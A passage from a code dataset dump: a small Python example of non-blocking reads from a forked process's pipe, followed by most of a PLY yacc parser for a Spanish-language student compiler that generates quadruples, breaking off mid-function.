/usr/bin/python\nfrom __future__ import print_function\nimport os\nimport fcntl\nimport time\n\n(fd_r, fd_w) = os.pipe()\n\nif os.fork() == 0:\n\twhile True:\n\t\tos.write(fd_w, 'c')\n\t\ttime.sleep(0.7)\nelse:\n\tfcntl.fcntl(fd_r, fcntl.F_SETFL, os.O_NONBLOCK)\n\twhile True:\n\t\ttry:\n\t\t\tr = os.read(fd_r, 1)\n\t\t\tprint(\"Ok\")\n\t\texcept:\n\t\t\tprint(\"Error\")\n\t\ttime.sleep(0.1)\n\n\n","sub_path":"chapitre-25/exemple-nonblock-2.py","file_name":"exemple-nonblock-2.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12725869","text":"import json\nimport ply.yacc as yacc\nfrom scanner import tokens\nfrom data_structures.functions_directory import FunctionsDirectory\nfrom data_structures.quadruple import Quadruple\nfrom data_structures.semantic_cube import semantic_cube\nfrom data_structures.constant_table import Constanttable\nfrom operaciones import Operations\n\nfun_dict = FunctionsDirectory()\nconst_table = Constanttable()\ntabla_temporales = []\npila_operandos = []\npila_operadores = []\npila_saltos = []\npila_tipos = []\ncuadruplos = []\ntemporal_var = [\"\", \"\"]\ntipo_funcion = 0\ntipo_parametros = []\ntipos_argumentos = []\npila_tipos_argumentos = []\npila_apuntador_argumentos = []\napuntador_argumento = -1\npila_guardar_variable = []\npila_nombre_func = []\nflag_return = False\nflag_dim_uno = False\nflag_dim_dos = False\ndimension_uno = -1\ndimension_dos = -1\n\nglobal_int = 1000\nglobal_float = 4000\nlocal = 8000\nlocal_int = 8000\nlocal_float = 12000\ntemporal_int = 16000\ntemporal_float = 19000\ntemporal_bool = 22000\nconstant_int = 24000\nconstant_float = 28000\nconstant_string = 32000\npointers = 36000\n\ndef restart_variables():\n global fun_dict\n global const_table\n global tabla_temporales\n global pila_operandos\n global pila_operadores\n global pila_saltos\n global pila_tipos\n global cuadruplos\n global temporal_var\n global tipo_funcion\n global tipo_parametros\n global tipos_argumentos\n global pila_tipos_argumentos\n global pila_apuntador_argumentos\n global apuntador_argumento\n global pila_guardar_variable\n global pila_nombre_func\n global flag_return\n global flag_dim_uno\n global flag_dim_dos\n global dimension_uno\n global dimension_dos\n global global_int\n global global_float\n global local\n global local_int\n global local_float\n global temporal_int\n global temporal_float\n global temporal_bool\n global constant_int\n global constant_float\n global constant_string\n global pointers\n\n fun_dict = FunctionsDirectory()\n const_table = Constanttable()\n tabla_temporales = []\n pila_operandos = []\n pila_operadores = []\n pila_saltos = []\n pila_tipos = []\n cuadruplos = []\n temporal_var = [\"\", \"\"]\n tipo_funcion = 0\n tipo_parametros = []\n tipos_argumentos = []\n pila_tipos_argumentos = []\n pila_apuntador_argumentos = []\n apuntador_argumento = -1\n pila_guardar_variable = []\n pila_nombre_func = []\n flag_return = False\n flag_dim_uno = False\n flag_dim_dos = False\n dimension_uno = -1\n dimension_dos = -1\n\n global_int = 1000\n global_float = 4000\n local = 8000\n local_int = 8000\n local_float = 12000\n temporal_int = 16000\n temporal_float = 19000\n temporal_bool = 22000\n constant_int = 24000\n constant_float = 28000\n constant_string = 32000\n pointers = 36000\n\n\n\ncomp_set = {'>', '<', '==', '&', '|', '>=', '<=', '!='}\n\n# programa\ndef p_program(p):\n '''program : PRO r_register_gotomain ID r_register_global PTOCOM opvars opfunciones 
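The os.pipe/O_NONBLOCK example earlier is Python-2 flavoured: on Python 3, os.write needs bytes, and the bare except also swallows unrelated errors alongside the EAGAIN case it is meant to catch. A Python-3 sketch of the parent's loop:

fcntl.fcntl(fd_r, fcntl.F_SETFL, os.O_NONBLOCK)
while True:
    try:
        os.read(fd_r, 1)            # the child must write bytes, e.g. b'c'
        print("Ok")
    except BlockingIOError:         # raised when the pipe is empty (EAGAIN)
        print("Error")
    time.sleep(0.1)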
MAIN r_switch_to_global PARIZQ PARDER bloque'''\n\ndef p_opvars(p):\n '''opvars : vars\n | empty'''\n\ndef p_opfunciones(p):\n '''opfunciones : funciones opfunciones\n | empty'''\n\ndef p_vars(p):\n '''vars : VARTOKEN tipo ID r_register_variable_name arr_uno arr_dos r_verify_array varciclo PTOCOM tipociclo'''\n\ndef p_varciclo(p):\n '''varciclo : COMA ID r_register_variable_name arr_uno arr_dos r_verify_array varciclo\n | empty'''\n\ndef p_arr(p):\n '''arr : CORIZQ CTEI r_register_const CORDER\n | empty'''\n\ndef p_arr_uno(p):\n '''arr_uno : CORIZQ CTEI r_register_const r_arr_dim_uno CORDER\n | empty'''\n\ndef p_arr_dos(p):\n '''arr_dos : CORIZQ CTEI r_register_const r_arr_dim_dos CORDER\n | empty'''\n\ndef p_tipociclo(p):\n '''tipociclo : tipo opciontipo\n | empty'''\n\ndef p_opciontipo(p):\n '''opciontipo : ID r_register_variable_name arr_uno arr_dos r_verify_array varciclo PTOCOM tipociclo\n | MODULE ID r_update_func_type r_update_curr_function_name_especial PARIZQ r_marcar_funcion opcionvarsimple r_desmarcar_funcion PARDER r_register_param_types opvars r_register_quad bloquefunc r_endfunc r_asegurar_return'''\n\ndef p_tipo(p):\n '''tipo : INT r_register_variable_type\n | FLT r_register_variable_type\n | CHAR r_register_variable_type'''\n\ndef p_tipo_func(p):\n '''tipo_func : INT r_register_function\n | FLT r_register_function\n | CHAR r_register_function\n '''\n\ndef p_varsimple(p):\n '''varsimple : tipo ident'''\n\ndef p_funciones(p):\n '''funciones : funcionvoid \n | funcion'''\n\ndef p_funcionvoid(p):\n '''funcionvoid : VOID r_register_function MODULE ID r_update_curr_function_name PARIZQ r_marcar_funcion opcionvarsimple r_desmarcar_funcion PARDER r_register_param_types opvars r_register_quad bloque r_endfunc'''\n\ndef p_opcionvarsimple(p):\n '''opcionvarsimple : varsimple ciclovarsimple\n | empty'''\n\ndef p_ciclovarsimple(p):\n '''ciclovarsimple : COMA varsimple ciclovarsimple\n | empty'''\n\ndef p_funcion(p): \n '''funcion : tipo_func MODULE ID r_update_curr_function_name PARIZQ r_marcar_funcion opcionvarsimple r_desmarcar_funcion PARDER r_register_param_types opvars r_register_quad bloquefunc r_endfunc r_asegurar_return'''\n\ndef p_ident(p):\n '''ident : ID r_register_variable_name arrini arrini'''\n\ndef p_arrini(p):\n '''arrini : CORIZQ CORDER\n | empty'''\n\ndef p_bloque(p):\n '''bloque : KEYIZQ bloqueopcion KEYDER'''\n\ndef p_bloqueopcion(p):\n '''bloqueopcion : estatuto bloqueopcion\n | empty'''\n\ndef p_bloquefunc(p):\n '''bloquefunc : KEYIZQ bloqueopcionfunc KEYDER'''\n\ndef p_bloqueopcionfunc(p):\n '''bloqueopcionfunc : estatutofunc bloqueopcionfunc\n | empty'''\n\ndef p_estatuto(p):\n '''estatuto : asignacion\n | decision\n | escritura\n | llamadafunc\n | repeticion\n | lectura'''\n\ndef p_estatutofunc(p):\n '''estatutofunc : asignacion\n | decisionfunc\n | escritura\n | llamadafunc\n | repeticionfunc\n | lectura\n | RETURN PARIZQ expresion r_return_func PARDER PTOCOM\n '''\n\ndef p_asignacion(p):\n '''asignacion : ID r_verifica_variable_existe r_guardar_variable arrexp_uno arrexp_dos r_pila_operandos_push IGU r_pila_operadores_push_igu expresion r_pop_igu PTOCOM'''\n\ndef p_expresion(p):\n '''expresion : exp r_pop_comp expresionsig'''\n\ndef p_expresionsig(p):\n '''expresionsig : MAY r_pila_operadores_push_may expresionsigequal expresion\n | MEN r_pila_operadores_push_men expresionsigequal expresion\n | DIF r_pila_operadores_push_dif expresion\n | IGUIGU r_pila_operadores_push_iguigu expresion\n | AND r_pila_operadores_push_and expresion\n | OR 
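The counters initialised in restart_variables above define the compiler's virtual-address map. Summarised as a table (the upper bounds are our inference from each following base address; the source only declares the bases):

#  1000- 3999  global int        16000-18999  temporal int
#  4000- 7999  global float      19000-21999  temporal float
#  8000-15999  local int/float   22000-23999  temporal bool
# 24000-27999  constant int      28000-31999  constant float
# 32000-35999  constant string   36000-       pointers (array addressing)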
r_pila_operadores_push_or expresion\n | MAYIGU r_pila_operadores_push_mayigu expresionsigequal expresion\n | MENIGU r_pila_operadores_push_menigu expresionsigequal expresion\n | empty'''\n\ndef p_expresionsigequal(p):\n '''expresionsigequal : IGU\n | empty'''\n\ndef p_exp(p):\n '''exp : termino r_pop_mas expciclo'''\n\ndef p_expciclo(p):\n '''expciclo : MAS r_pila_operadores_push_mas exp\n | MENOS r_pila_operadores_push_menos exp\n | empty\n '''\n\ndef p_termino(p):\n '''termino : factor r_pop_mult factorciclo'''\n\ndef p_factorciclo(p):\n '''factorciclo : MULT r_pila_operadores_push_mult termino\n | DIV r_pila_operadores_push_div termino\n | empty\n '''\n\ndef p_factor(p):\n '''factor : PARIZQ r_marcar_fondo_de_pila expresion r_desmarcar_fondo_de_pila PARDER\n | masomenos varcte\n | ID r_verifica_variable_existe r_guardar_variable opcionid r_pila_operandos_push\n '''\n\ndef p_masomenos(p):\n '''masomenos : MAS\n | MENOS\n | empty\n '''\n\ndef p_opcionid(p):\n '''opcionid : PARIZQ r_era_funcion_retorno parametros r_terminar_parametro PARDER \n | arrexp_uno arrexp_dos '''\n\ndef p_arrexp_uno(p):\n '''arrexp_uno : CORIZQ r_push_arr expresion r_verifica_arrexp_uno CORDER\n | empty'''\n\ndef p_arrexp_dos(p):\n '''arrexp_dos : CORIZQ r_push_arr expresion r_verifica_arrexp_dos CORDER\n | empty'''\n\ndef p_varcte(p):\n '''varcte : iddim\n | CTEI r_pila_operandos_push_cte_int\n | CTEF r_pila_operandos_push_cte_flt\n '''\n\ndef p_parametros(p):\n '''parametros : expresion r_extraer_parametro cicloparametros\n | empty'''\n\ndef p_cicloparametros(p):\n '''cicloparametros : COMA expresion r_extraer_parametro cicloparametros\n | empty\n '''\n\ndef p_llamadafunc(p):\n '''llamadafunc : ID r_verifica_void PARIZQ r_era_funcion_void parametros r_terminar_parametro_void PARDER PTOCOM'''\n\ndef p_decision(p):\n '''decision : IF PARIZQ expresion PARDER r_if_paso_1 THEN bloque decision_else r_if_paso_3'''\n\ndef p_decision_else(p):\n '''decision_else : ELSE r_if_paso_2 bloque\n | empty'''\n\ndef p_decisionfunc(p):\n '''decisionfunc : IF PARIZQ expresion PARDER r_if_paso_1 THEN bloquefunc decisionfunc_else r_if_paso_3\n '''\n\ndef p_decisionfunc_else(p):\n '''decisionfunc_else : ELSE r_if_paso_2 bloquefunc\n | empty'''\n\ndef p_condicional(p):\n '''condicional : WHILE r_while_paso_1 PARIZQ expresion PARDER r_while_paso_2 DO bloque r_while_paso_3'''\n\ndef p_condicionalfunc(p):\n '''condicionalfunc : WHILE r_while_paso_1 PARIZQ r_while_paso_2 expresion PARDER DO bloquefunc'''\n\ndef p_nocondicional(p):\n '''nocondicional : FOR ID r_verifica_variable_existe r_guardar_variable arrexp_uno arrexp_dos r_pila_operandos_push IGU r_pila_operadores_push_igu expresion TO r_pop_igu_for expresion r_for_paso_1 DO bloque r_for_paso_2\n '''\n\ndef p_nocondicionalfunc(p):\n '''nocondicionalfunc : FOR ID r_verifica_variable_existe r_guardar_variable arrexp_uno arrexp_dos r_pila_operandos_push IGU r_pila_operadores_push_igu expresion TO r_pop_igu_for expresion r_for_paso_1 DO bloquefunc r_for_paso_2'''\n\ndef p_escritura(p):\n '''escritura : WRITE PARIZQ escrituraciclo otro PARDER PTOCOM'''\n\ndef p_lectura(p):\n '''lectura : READ PARIZQ ID r_verifica_variable_existe r_guardar_variable arrexp_uno arrexp_dos r_pila_operandos_push r_genera_lectura ciclodim PARDER PTOCOM'''\n\ndef p_escrituraciclo(p):\n '''escrituraciclo : CTE_STRING r_genera_escribe_string\n | expresion r_genera_escribe'''\n\ndef p_otro(p):\n '''otro : COMA escrituraciclo otro\n | empty\n '''\n\ndef p_repeticion(p):\n '''repeticion : condicional \n | nocondicional\n 
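The expression grammar above only pushes operands, types and operators; the result type of each operation is resolved further down (r_pop_mult, r_pop_mas, r_pop_comp) by indexing semantic_cube[tipo_izq][tipo_der][operator]. A minimal sketch of that table's shape; the entries here are illustrative, the real table lives in data_structures.semantic_cube:

semantic_cube_sketch = {
    'int': {
        'int':   {'+': 'int',   '*': 'int',   '<': 'bool'},
        'float': {'+': 'float', '*': 'float', '<': 'bool'},
    },
}
assert semantic_cube_sketch['int']['float']['+'] == 'float'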
'''\n\ndef p_repeticionfunc(p):\n '''repeticionfunc : condicionalfunc\n | nocondicionalfunc\n '''\n\ndef p_empty(p):\n 'empty :'\n pass\n\ndef p_ciclodim(p):\n '''ciclodim : COMA iddim r_genera_lectura ciclodim\n | empty\n '''\n\ndef p_iddim(p):\n '''iddim : ID r_verifica_variable_existe r_pila_operandos_push_id arrexp arrexp'''\n\ndef p_arrexp(p):\n '''arrexp : CORIZQ expresion CORDER\n | empty'''\n\ndef p_error(p):\n if p:\n print(\"Syntax error at token\", p.type)\n raise Exception(\"ERROR, el input no cumple con todas las reglas gramaticales\")\n\n\n# Counters reset\ndef reset_counters():\n global local\n global temporal_int\n global temporal_float\n global temporal_bool\n\n\n local = 8000\n temporal_int = 16000\n temporal_float = 19000\n temporal_bool = 22000\n\n# * Puntos neurálgicos registro de funciones\ndef p_r_register_gotomain(p):\n 'r_register_gotomain : '\n cuad = Quadruple('goto',None,None,None)\n cuadruplos.append(cuad)\n pila_saltos.append(len(cuadruplos) - 1)\n\ndef p_r_register_global(p):\n 'r_register_global : '\n fun_dict.add_function(\"global\")\n fun_dict.update_curr_function_name(\"global\")\n\ndef p_r_register_function(p):\n 'r_register_function : '\n exists = fun_dict.search_function(p[-1])\n if exists:\n raise Exception(\"La función que intentas declarar ya existe \" + p[-1])\n fun_dict.add_function(p[-1])\n\ndef p_r_register_const(p):\n 'r_register_const : '\n global constant_int\n insertion = const_table.insert_constant(p[-1], 'int', constant_int)\n if insertion == constant_int:\n constant_int += 1\n\n\ndef p_r_switch_to_global(p):\n 'r_switch_to_global : '\n fun_dict.curr_function = fun_dict.directory[0]\n salto = pila_saltos.pop()\n cuadruplos[salto].modificar_resultado(len(cuadruplos))\n\n\ndef p_r_update_curr_function_name_especial(p):\n 'r_update_curr_function_name_especial : '\n fun_dict.update_curr_function_name(p[-2])\n reset_counters()\n\ndef p_r_update_curr_function_name(p):\n 'r_update_curr_function_name : '\n fun_dict.update_curr_function_name(p[-1])\n reset_counters()\n\ndef p_r_register_param_types(p):\n 'r_register_param_types : '\n \n curr_func = fun_dict.curr_function\n global global_float\n global global_int\n \n if curr_func.type == \"float\":\n fun_dict.add_function_to_global(curr_func.name + \"_func\", curr_func.type, global_float)\n global_float += 1\n\n elif curr_func.type == \"int\":\n fun_dict.add_function_to_global(curr_func.name + \"_func\", curr_func.type, global_int)\n global_int += 1\n \n \n\ndef p_r_register_variable_type(p):\n 'r_register_variable_type : '\n if tipo_funcion == 1:\n tipo_parametros.append(p[-1])\n temporal_var[0] = p[-1]\n\ndef p_r_update_func_type(p):\n 'r_update_func_type : '\n fun_dict.add_function(temporal_var[0])\n\ndef p_r_register_quad(p):\n 'r_register_quad : '\n fun_dict.add_quadruple(len(cuadruplos))\n\ndef p_r_era_funcion_void(p):\n 'r_era_funcion_void : '\n # guardar nombre de la función llamada\n pila_operadores.append(\"FUNC\")\n nombre_func = p[-3]\n pila_nombre_func.append(nombre_func)\n func = fun_dict.search_function(nombre_func)\n\n if func:\n if func.type == \"void\":\n global apuntador_argumento\n cuad = Quadruple('era',None,None,nombre_func)\n cuadruplos.append(cuad)\n if apuntador_argumento > -1:\n pila_apuntador_argumentos.append(apuntador_argumento)\n #pila_tipos_argumentos.append(tipos_argumentos)\n if len(tipos_argumentos)> 0:\n apuntador_argumento = 0\n else:\n raise Exception(\"La función \" + nombre_func + \" tiene tipo de retorno\")\n\n else:\n raise Exception(\"La función \" + 
nombre_func + \" no ha sido declarada\")\n\ndef p_r_era_funcion_retorno(p):\n 'r_era_funcion_retorno : '\n # guardar nombre de la función llamada\n pila_operadores.append(\"FUNC\")\n nombre_func = pila_guardar_variable[-1]\n pila_nombre_func.append(nombre_func)\n func = fun_dict.search_function(nombre_func)\n if func:\n if func.type != \"void\":\n global apuntador_argumento\n cuad = Quadruple('era',None,None,nombre_func)\n cuadruplos.append(cuad)\n if apuntador_argumento > -1:\n pila_apuntador_argumentos.append(apuntador_argumento)\n if len(tipos_argumentos)> 0:\n apuntador_argumento = 0\n else:\n raise Exception(\"La función \" + nombre_func + \" es de tipo void\")\n\n else:\n raise Exception(\"La función \" + nombre_func + \" no ha sido declarada\")\n\ndef p_r_asegurar_return(p):\n 'r_asegurar_return : '\n global flag_return\n if flag_return == False:\n raise Exception(\"No se regresó ningún valor para la función \" + fun_dict.curr_function.name)\n\n else:\n flag_return = False\n\n pass\n\ndef p_r_terminar_parametro(p):\n 'r_terminar_parametro : '\n global apuntador_argumento\n global tipos_argumentos\n global temporal_int\n pila_operadores.pop()\n nombrefunc = pila_nombre_func.pop()\n num_quad = fun_dict.search_quad(nombrefunc)\n cuad = Quadruple('gosub',None,None,num_quad)\n cuadruplos.append(cuad)\n if apuntador_argumento != -1:\n if apuntador_argumento < len(tipos_argumentos):\n raise Exception(\"Faltan argumentos en la llamada a la función\")\n else:\n if len(pila_apuntador_argumentos) > 0:\n apuntador_argumento = pila_apuntador_argumentos.pop()\n else:\n apuntador_argumento = -1\n if len(pila_tipos_argumentos) > 0:\n tipos_argumentos = pila_tipos_argumentos.pop()\n else:\n tipos_argumentos = []\n\ndef p_r_terminar_parametro_void(p):\n 'r_terminar_parametro_void : '\n global apuntador_argumento\n global tipos_argumentos\n global temporal_int\n pila_operadores.pop()\n nombrefunc = pila_nombre_func.pop()\n num_quad = fun_dict.search_quad(nombrefunc)\n cuad = Quadruple('gosub',None,None,num_quad)\n cuadruplos.append(cuad)\n if apuntador_argumento != -1:\n if apuntador_argumento < len(tipos_argumentos):\n raise Exception(\"Faltaron argumentos a la llamada de funcion\")\n else:\n if len(pila_apuntador_argumentos) > 0:\n apuntador_argumento = pila_apuntador_argumentos.pop()\n else:\n apuntador_argumento = -1\n if len(pila_tipos_argumentos) > 0:\n tipos_argumentos = pila_tipos_argumentos.pop()\n else:\n tipos_argumentos = []\n\ndef p_r_extraer_parametro(p):\n 'r_extraer_parametro : '\n global apuntador_argumento\n if apuntador_argumento < len(tipos_argumentos) and len(tipos_argumentos) > 0 :\n resultado = pila_operandos.pop()\n if tipos_argumentos[apuntador_argumento] == 'int':\n cuad = Quadruple('parameter',resultado,None,\"parameter\" + str(apuntador_argumento) )\n cuadruplos.append(cuad)\n apuntador_argumento+=1\n elif tipos_argumentos[apuntador_argumento] == 'float':\n cuad = Quadruple('parameter',resultado,None,\"parameter\"+str(apuntador_argumento))\n cuadruplos.append(cuad)\n apuntador_argumento+=1\n else:\n raise Exception(\"el tipo de argumento no es del tipo del parametro\")\n else:\n raise Exception(\"La funcion no tiene ese numero de parametros\")\n\ndef p_r_verifica_void(p):\n 'r_verifica_void : '\n global tipos_argumentos\n global pila_tipos_argumentos\n func = fun_dict.search_function(p[-1])\n if func:\n if func.type == \"void\":\n tipos_argumentos_defunc = fun_dict.search_existing_name(p[-1])\n if apuntador_argumento >= 0:\n pila_tipos_argumentos.append(tipos_argumentos)\n 
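For a call f(a, b), the actions above (r_era_funcion_*, r_extraer_parametro, r_terminar_parametro*) emit the classic activation-record sequence; operand fields are simplified here, following the Quadruple(op, left, right, result) layout used throughout:

# ('era',       None, None, 'f')           allocate f's activation record
# ('parameter', a,    None, 'parameter0')  copy each argument into place
# ('parameter', b,    None, 'parameter1')
# ('gosub',     None, None, quad_of_f)     jump to f's first quadruple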
tipos_argumentos = tipos_argumentos_defunc\n if tipos_argumentos == -1:\n raise Exception(\"Error, la variable no está declarada en ningún contexto \" + p[-1])\n pass\n\n else:\n raise Exception(\"La función llamada no es de tipo void\")\n\ndef p_r_marcar_funcion(p):\n 'r_marcar_funcion : '\n global tipo_funcion\n tipo_funcion = 1\n\ndef p_r_desmarcar_funcion(p):\n 'r_desmarcar_funcion : '\n global tipo_funcion\n global tipo_parametros\n tipo_funcion = 0\n e = fun_dict.add_typesofparameter(tipo_parametros)\n tipo_parametros = []\n\n\ndef p_r_endfunc(p):\n 'r_endfunc : '\n cuad = Quadruple('endfunc',None,None,None)\n cuadruplos.append(cuad)\n #guardar el tamaño se lo que funcion size.append([lo que uso ])\n\ndef p_r_if_paso_1(p):\n 'r_if_paso_1 : '\n #preguntar el tipo si el operando es boolano\n result = pila_operandos.pop()\n cuad = Quadruple('gotof', result, None,None)\n cuadruplos.append(cuad)\n pila_saltos.append(len(cuadruplos)-1)\n\ndef p_r_register_variable_name(p):\n 'r_register_variable_name : '\n global global_int\n global local\n global global_float\n temporal_var[1] = p[-1]\n if temporal_var[0] == \"int\":\n if fun_dict.curr_function.name == \"global\":\n fun_dict.append_variable_to_curr_function(temporal_var[1], temporal_var[0], global_int)\n global_int += 1\n else:\n fun_dict.append_variable_to_curr_function(temporal_var[1], temporal_var[0], local)\n local += 1\n\n fun_dict.curr_function.int_spaces += 1\n\n\n elif temporal_var[0] == \"float\":\n if fun_dict.curr_function.name == \"global\":\n fun_dict.append_variable_to_curr_function(temporal_var[1], temporal_var[0], global_float)\n global_float += 1\n\n else:\n fun_dict.append_variable_to_curr_function(temporal_var[1], temporal_var[0], local)\n local += 1\n\n fun_dict.curr_function.float_spaces += 1\n\n\n else:\n raise Exception(\"El tipo de dato especificado, no existe \" + temporal_var[0])\n \ndef p_r_arr_dim_uno(p):\n 'r_arr_dim_uno : '\n global dimension_uno\n global flag_dim_uno\n dimension_uno = p[-2]\n if dimension_uno == 0:\n raise Exception(\"La dimension de la variable \" + temporal_var[1]+ \" no puede ser 0\")\n flag_dim_uno = True\n\ndef p_r_arr_dim_dos(p):\n 'r_arr_dim_dos : '\n global dimension_dos\n global flag_dim_dos\n dimension_dos = p[-2]\n if dimension_dos == 0:\n raise Exception(\"La dimension de la variable \" + temporal_var[1]+ \" no puede ser 0\")\n flag_dim_dos = True\n\ndef p_r_verify_array(p):\n 'r_verify_array : '\n global global_int\n global local\n global global_float\n global flag_dim_uno\n global flag_dim_dos\n if flag_dim_uno == True and flag_dim_dos == True:\n fun_dict.add_dim_two(temporal_var[1],dimension_uno,dimension_dos)\n espacios = dimension_uno * dimension_dos\n if temporal_var[0] == \"int\":\n if fun_dict.curr_function.name == \"global\":\n global_int += espacios - 1\n else:\n local += espacios - 1\n fun_dict.curr_function.int_spaces += espacios - 1\n elif temporal_var[0] == \"float\":\n if fun_dict.curr_function.name == \"global\":\n global_float += espacios - 1\n else:\n local += espacios - 1\n fun_dict.curr_function.float_spaces += espacios - 1\n elif flag_dim_uno == True and flag_dim_dos == False:\n fun_dict.add_dim_one(temporal_var[1],dimension_uno)\n espacios = dimension_uno\n if temporal_var[0] == \"int\":\n if fun_dict.curr_function.name == \"global\":\n global_int += espacios - 1\n else:\n local += espacios - 1\n fun_dict.curr_function.int_spaces += espacios - 1\n elif temporal_var[0] == \"float\":\n if fun_dict.curr_function.name == \"global\":\n global_float += espacios - 
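r_if_paso_1 above emits a gotof with an empty target and parks its index on pila_saltos; r_if_paso_2 and r_if_paso_3 (further down) backpatch it once the block sizes are known. The generated shape, as a sketch:

#     t = <condition>
#     gotof t -> ELSE     emitted by paso_1, target filled in later
#     <then-block>
#     goto -> END         paso_2, only present when there is an else
# ELSE: <else-block>
# END:                    paso_3 patches the pending jump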
1\n else:\n local += espacios - 1\n fun_dict.curr_function.float_spaces += espacios - 1\n flag_dim_uno = False\n flag_dim_dos = False\n\ndef p_r_verifica_variable_existe(p):\n 'r_verifica_variable_existe : '\n global tipos_argumentos\n global pila_tipos_argumentos\n var, e = fun_dict.curr_function.vars.search(p[-1])\n if not var:\n # search in global\n func = fun_dict.search_function(\"global\")\n if func:\n var, e = func.vars.search(p[-1])\n if not var:\n tipos_argumentos_defunc = fun_dict.search_existing_name(p[-1])\n if apuntador_argumento >= 0:\n pila_tipos_argumentos.append(tipos_argumentos)\n tipos_argumentos = tipos_argumentos_defunc\n if tipos_argumentos == -1:\n raise Exception(\"la variable no está declarada en ningún contexto \" + p[-1])\n pass\n\ndef p_r_verifica_arrexp_uno(p):\n 'r_verifica_arrexp_uno : '\n global pointers\n global temporal_int\n global constant_int\n name_var = pila_guardar_variable.pop()\n var = fun_dict.get_variable(name_var)\n\n pila_operadores.pop()\n if var[\"dim_uno\"] == None:\n raise Exception(\"La variable \" + name_var + \" no es un arreglo\")\n elif (\"dim_uno\" in var and var[\"dim_uno\"] != None) and (\"dim_dos\" in var and var[\"dim_dos\"] == None):\n index = pila_operandos.pop()\n tipo_var = pila_tipos.pop()\n if tipo_var != \"int\":\n raise Exception(\"La expresion tiene que ser de tipo entero\")\n \n l_limit = const_table.insert_constant(0, \"int\", constant_int)\n if l_limit == constant_int:\n constant_int += 1\n\n u_limit = const_table.insert_constant(var[\"dim_uno\"], \"int\", constant_int)\n if u_limit == constant_int:\n constant_int += 1\n\n quad = Quadruple('ver',index,l_limit,u_limit)\n\n cuadruplos.append(quad)\n quad = Quadruple('+_',index,var[\"virtual_address\"],pointers)\n cuadruplos.append(quad)\n pila_tipos.append(var[\"type\"])\n pila_operandos.append(pointers)\n pila_guardar_variable.append(\"tipo arreglo\")\n pointers+=1\n elif (\"dim_uno\" in var and var[\"dim_uno\"] != None) and (\"dim_dos\" in var and var[\"dim_dos\"] != None):\n pila_guardar_variable.append(name_var)\n pila_guardar_variable.append(\"tipo matriz\")\n \n index = pila_operandos.pop()\n tipo_var = pila_tipos.pop()\n if tipo_var != \"int\":\n raise Exception(\"La expresion tiene que ser de tipo entero\")\n\n l_limit = const_table.insert_constant(0, \"int\", constant_int)\n if l_limit == constant_int:\n constant_int += 1\n\n u_limit = const_table.insert_constant(var[\"dim_uno\"], \"int\", constant_int)\n if u_limit == constant_int:\n constant_int += 1\n\n quad = Quadruple('ver',index,l_limit,u_limit)\n cuadruplos.append(quad)\n\n quad = Quadruple('*_',index,var[\"dim_dos\"],temporal_int)\n cuadruplos.append(quad)\n pila_tipos.append(\"int\")\n pila_operandos.append(temporal_int)\n temporal_int+=1\n\ndef p_r_verifica_arrexp_dos(p):\n 'r_verifica_arrexp_dos : '\n global pointers\n global temporal_int\n global constant_int\n pila_operadores.pop()\n verifica = pila_guardar_variable.pop()\n if (verifica == \"tipo arreglo\"):\n raise Exception(\"La variable no es una matriz\")\n name_var = pila_guardar_variable.pop()\n var = fun_dict.get_variable(name_var)\n if (\"dim_uno\" in var and var[\"dim_uno\"] != None) and (\"dim_dos\" in var and var[\"dim_dos\"] != None):\n pila_guardar_variable.append(\"tipo arreglo\")\n index = pila_operandos.pop()\n tipo_var = pila_tipos.pop()\n if tipo_var != \"int\":\n raise Exception(\"La expresion tiene que ser de tipo entero\")\n\n l_limit = const_table.insert_constant(0, \"int\", constant_int)\n if l_limit == constant_int:\n 
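The r_verifica_arrexp rules above and below implement textbook base-plus-offset addressing with bounds checks. For m[i][j] declared as m[R][C], the emitted quadruples are, in order (t1, t2, ptr are temporaries, ptr in the pointer space starting at 36000; constant operands shown as values, not constant-table addresses):

# ('ver', i,  0, R)            check 0 <= i < R
# ('*_',  i,  C, t1)           t1 = i * C
# ('ver', j,  0, C)            check 0 <= j < C
# ('+',   t1, j, t2)           t2 = i * C + j
# ('+_',  t2, base, ptr)       ptr = &m + offset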
constant_int += 1\n\n u_limit = const_table.insert_constant(var[\"dim_dos\"], \"int\", constant_int)\n if u_limit == constant_int:\n constant_int += 1\n\n quad = Quadruple('ver',index,l_limit,u_limit)\n cuadruplos.append(quad)\n temporal_index = pila_operandos.pop()\n pila_tipos.pop()\n quad = Quadruple('+',temporal_index,index,temporal_int)\n cuadruplos.append(quad)\n quad = Quadruple('+_',temporal_int,var[\"virtual_address\"],pointers)\n cuadruplos.append(quad)\n temporal_int+=1\n pila_tipos.append(var[\"type\"])\n pila_operandos.append(pointers)\n pointers+=1\n\n\ndef p_r_return_func(p):\n 'r_return_func : '\n global flag_return\n flag_return = True\n result = pila_operandos.pop()\n tipo = pila_tipos.pop()\n if tipo == fun_dict.curr_function.type:\n space = fun_dict.search_global(fun_dict.curr_function.name + '_func')[\"virtual_address\"]\n cuad = Quadruple('return',space, None,result)\n cuadruplos.append(cuad)\n\n else:\n curr_func = fun_dict.curr_function\n raise Exception(\"Error, la función \" + curr_func.name + \" es de tipo \" + curr_func.type + \" y el retorno de tipo \" + tipo)\n\ndef p_r_if_paso_2(p):\n 'r_if_paso_2 : '\n cuad = Quadruple('goto',None, None,None)\n cuadruplos.append(cuad)\n salto = pila_saltos.pop()\n pila_saltos.append(len(cuadruplos)-1)\n cuadruplos[salto].modificar_resultado(len(cuadruplos))\n\ndef p_r_if_paso_3(p):\n 'r_if_paso_3 : '\n salto = pila_saltos.pop()\n cuadruplos[salto].modificar_resultado(len(cuadruplos))\n\ndef p_r_while_paso_1(p):\n 'r_while_paso_1 : '\n pila_saltos.append(len(cuadruplos))\n\ndef p_r_while_paso_2(p):\n 'r_while_paso_2 : '\n #preguntar el tipo si el operando es boolano\n resultado = pila_operandos.pop()\n cuad = Quadruple('gotof', resultado, None,None)\n pila_saltos.append(len(cuadruplos))\n cuadruplos.append(cuad)\n\ndef p_r_while_paso_3(p):\n 'r_while_paso_3 : '\n #preguntar el tipo si el operando es boolano\n salto_al_final = pila_saltos.pop()\n salto_al_regreso = pila_saltos.pop()\n cuad = Quadruple('goto', None, None,salto_al_regreso)\n cuadruplos.append(cuad)\n cuadruplos[salto_al_final].modificar_resultado(len(cuadruplos))\n\ndef p_r_pop_igu_for(p):\n 'r_pop_igu_for : '\n operando_der = pila_operandos.pop()\n operando_izq = pila_operandos.pop()\n tipo_der = pila_tipos.pop()\n tipo_izq = 